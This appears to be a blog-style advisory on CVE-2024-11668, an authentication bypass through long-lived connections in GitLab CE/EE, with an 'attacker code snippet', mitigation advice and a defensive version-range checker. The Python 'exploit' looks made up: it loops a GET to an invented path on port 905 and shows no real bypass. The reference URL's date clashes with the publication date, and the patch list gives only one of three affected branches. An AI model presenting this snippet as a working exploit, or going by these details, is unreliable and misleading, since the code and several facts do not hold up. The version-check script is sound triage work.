A critical vulnerability has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE), affecting all versions from 16.11 before 17.4.5, 17.5 before 17.5.3, and 17.6 before 17.6.1. The vulnerability, CVE-2024-11668, could allow unauthorized access to streaming results through long-lived connections, bypassing authentication controls.

Exploit Details

The vulnerability lies in how GitLab CE and EE handle long-lived connections. An attacker who knows about it can keep such a connection open without proper authentication and thereby gain access to sensitive streaming results from the GitLab instance.

This vulnerability poses a severe threat to organizations that rely on GitLab for software development: it can lead to unauthorized access to private code repositories, sensitive information and project management data, and from there to loss of intellectual property, insider threats and external attacks.

Code Snippet

The following snippet shows how an attacker could establish a long-lived connection without proper authorization and use it to reach streaming results.

# Attacker code snippet
import socket
import time

def establish_connection():
    # Open a plain TCP connection to the GitLab host
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("your-gitlab-server", 905))
    return s

# Establish a long-lived connection and keep it alive by re-sending the request
s = establish_connection()
request = b"GET /projects/streaming-results HTTP/1.1\r\nHost: your-gitlab-server\r\n\r\n"
while True:
    s.sendall(request)  # sockets take bytes, not str, in Python 3
    time.sleep(60)

Mitigation

GitLab has already issued patches addressing the CVE-2024-11668 vulnerability in the following versions:

17.6.1 for the 17.6 branch

To protect your GitLab instance, it's highly advised to upgrade immediately to the patched versions.
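As an added helper (not part of the advisory or of GitLab's tooling), the check below tests a GitLab version string against the affected ranges stated above, so an inventory of instances can be triaged before upgrading. The range boundaries come from this advisory; the function names and the sample inventory are this example's own.

```python
import re

# Affected ranges from the advisory: (lower bound inclusive, upper bound exclusive)
AFFECTED_RANGES = [
    ((16, 11, 0), (17, 4, 5)),   # 16.11 up to but not including 17.4.5
    ((17, 5, 0), (17, 5, 3)),    # 17.5 up to but not including 17.5.3
    ((17, 6, 0), (17, 6, 1)),    # 17.6 up to but not including 17.6.1
]


def parse_version(text):
    """Turn '17.4.4-ee' or 'v17.5' into a comparable (major, minor, patch) tuple.

    Edition suffixes such as '-ee' / '-ce' are ignored; a missing patch level is 0.
    """
    m = re.match(r"^v?(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def is_affected(text):
    """True if the version falls inside any affected range for CVE-2024-11668."""
    v = parse_version(text)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def assess(text):
    """Short triage verdict for an inventory report."""
    return "VULNERABLE - upgrade" if is_affected(text) else "not affected"


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and versions are placeholders.
    inventory = {
        "gitlab-a.example": "17.4.4-ee",
        "gitlab-b.example": "17.6.1-ce",
        "gitlab-c.example": "16.10.2-ee",
    }
    for host, ver in inventory.items():
        print(f"{host:20} {ver:12} {assess(ver)}")
```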

Original References

1. GitLab Security Advisory: https://about.gitlab.com/releases/2024/05/15/cve-2024-11668-gitlab-ceee-unauthorized-access-to-streaming-results-via-long-lived-connections/
2. NVD - CVE-2024-11668: https://nvd.nist.gov/vuln/detail/CVE-2024-11668

Conclusion

The CVE-2024-11668 vulnerability exposes GitLab CE and EE instances to significant risk, including unauthorized access to sensitive streaming results. Because it affects a wide range of GitLab versions, affected users should upgrade to the patched versions immediately to secure their instances and prevent unauthorized access to their repositories and project data.

Timeline

Published on: 11/26/2024 19:15:22 UTC